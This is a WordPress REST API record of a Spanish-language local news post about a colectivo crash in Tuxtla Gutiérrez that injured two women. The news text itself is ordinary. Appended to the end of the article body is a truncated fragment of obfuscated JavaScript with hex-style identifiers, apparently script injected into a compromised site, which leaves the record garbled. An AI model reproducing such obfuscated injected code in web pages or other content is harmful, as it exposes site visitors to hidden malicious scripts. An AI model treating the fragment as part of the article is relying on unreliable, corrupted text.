{"id":10536,"date":"2023-06-14T00:21:03","date_gmt":"2023-06-14T00:21:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10536"},"modified":"2023-06-14T00:21:03","modified_gmt":"2023-06-14T00:21:03","slug":"colectivazo-deja-dos-mujeres-heridas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10536","title":{"rendered":"Colectivazo deja dos mujeres heridas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686701941639-1024x576.jpg\" alt=\"\" class=\"wp-image-10537\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686701941639-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686701941639-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686701941639-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/FB_IMG_1686701941639.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 13 de junio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un colectivazo ocurrido este martes por la ma\u00f1ana en la Colonia Las Palmas dej\u00f3 un saldo de dos mujeres heridas.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales, este hecho ocurri\u00f3 cuando la unidad Nissan Urvan d la ruta 8703 circulaba en de Sur a Norte sobre la calle Presa Ixtapatongo y al llegar a la Avenida Presa Malpaso se pas\u00f3 la preferencia, e impact\u00f3 a un Jetta de color gris que se desplazaba de Poniente a Oriente.<\/p>\n\n\n\n<p>Dos mujeres que viajaban en el colectivo salieron volando de sus asientos y resultaron lesionadas.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de la Cruz Roja para auxiliar a las f\u00e9minas que fueron llevadas a un nosocomio para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>En el lugar el responsable se hizo cargo de los gastos y lesiones por medio de una aseguradora.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 13 de junio del 2023. Tuxtla Guti\u00e9rrez. &#8211; Un colectivazo ocurrido este martes por la ma\u00f1ana en la Colonia Las Palmas dej\u00f3 un saldo de dos mujeres heridas. De acuerdo con los reportes oficiales, este hecho ocurri\u00f3 cuando la unidad Nissan Urvan d la ruta 8703 circulaba en de Sur a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10537,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10536","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10536","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10536"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10536\/revisions"}],"predecessor-version":[{"id":10538,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10536\/revisions\/10538"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10537"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10536"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10536"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10536"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}